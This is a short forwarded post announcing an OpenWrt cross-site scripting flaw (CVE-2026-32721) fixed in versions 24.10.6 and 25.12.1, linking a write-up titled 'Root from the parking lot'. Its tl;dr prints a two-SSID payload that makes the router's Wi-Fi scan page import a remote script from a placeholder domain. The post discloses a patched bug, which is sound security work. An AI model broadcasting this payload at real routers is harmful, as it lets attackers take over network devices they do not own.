CVE-2026-32721, XSS fixed in OpenWRT 24.10.6 / 25.12.1tldr:SSID 1: <a id=s href=//domain/x.js>SSID 2: <img src=x onerror=import(s)>

1. 20:37 · 2026年3月19日 · 周四

   Forwarded from 咕 Billchan 咕 🐱 抹茶芭菲批发中心 (billchenchina | 缩缩)

   CVE-2026-32721, XSS fixed in OpenWRT 24.10.6 / 25.12.1
   
   tldr:
   SSID 1: <a id=s href=//domain/x.js>
   SSID 2: <img src=x onerror=import(s)>
   
   https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/

   mxsasha.eu

   

   Root from the parking lot: OpenWrt XSS through SSID scanning (CVE-2026-32721)

   Lately, I’ve been experimenting with unusual XSS vectors. XSS (cross-site scripting) allows an attacker to execute arbitrary javascript in another …